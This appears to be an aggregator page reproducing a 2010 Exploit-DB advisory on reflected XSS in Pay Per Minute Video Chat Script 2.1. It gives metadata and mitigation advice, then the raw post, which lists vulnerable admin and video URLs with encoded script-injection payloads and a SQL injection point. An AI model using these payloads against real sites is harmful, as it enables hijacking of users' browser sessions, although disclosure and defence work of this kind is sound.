Suffer from Multi XSS Vulnerability

vendor:

Pay Per Minute Video Chat Script

by:

R3d-D3v!L

8,8

CVSS

HIGH

XSS

CWE

Product Name: Pay Per Minute Video Chat Script

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: NO

Related CWE: N/A

CPE: a:payperviewvideosoftware.com:pay_per_minute_video_chat_script:2.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2010

Suffer from Multi XSS Vulnerability

Pay Per Minute Video Chat Script V 2.1 is vulnerable to multiple XSS attacks. An attacker can inject malicious JavaScript code into the vulnerable parameters of the application. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to prevent XSS attacks. All user-supplied input should be validated and filtered before being used in the application.

Source

Exploit-DB raw data:

[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: suffer from multi XSS Vulnerability
[~] Vendor: payperviewvideosoftware.com
[?] Software : Pay Per Minute Video Chat Script V 2.1
[-] pR!CE : $269.00 USD.
[?] author: ((R3d-D3v!L))
[?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY
[?] contact: N/A
[-]
[?] Date: 4.Jan.2010
[?] T!ME: 07:15 pm GMT
[?] Home: WwW.xP10.ME
[?]
[?]
[-]??????????????????????{DEV!L'5 of SYST3M}??????????????????

XSS:

[*] Err0r C0N50L3:

http://server/P47H/admin/memberviewdetails.php?id=
http://server/P47H/videos.php?model=

[~] {EV!L EXPLO!T}:


//server/P47H/admin/memberviewdetails.php?id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E

http://server/P47H/videos.php?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E


SQL Injection:

[*] Err0r C0N50L3:

http://server/P47H/index_ie.php?page=-666

[~] {EV!L EXPLO!T}:

n07 ALL0w AT Th!S T!ME

N073:

REAL RED DEV!L W@S h3r3 LAMERZ


GAZA !N our hearts !


[~]-----------------------------{((Angela Bennett))}---------------------------------------


[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987

[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ

[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4

[?]spechial SupP0RT: MY M!ND ;) & dookie2000ca &((OFFsec))

[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t))

[~]spechial FR!ND: 74M3M

[~] !'M 4R48!4N 3XPL0!73R.

[~]{[(D!R 4ll 0R D!E)]};

[~]---------------------------------------------------------------------------------------------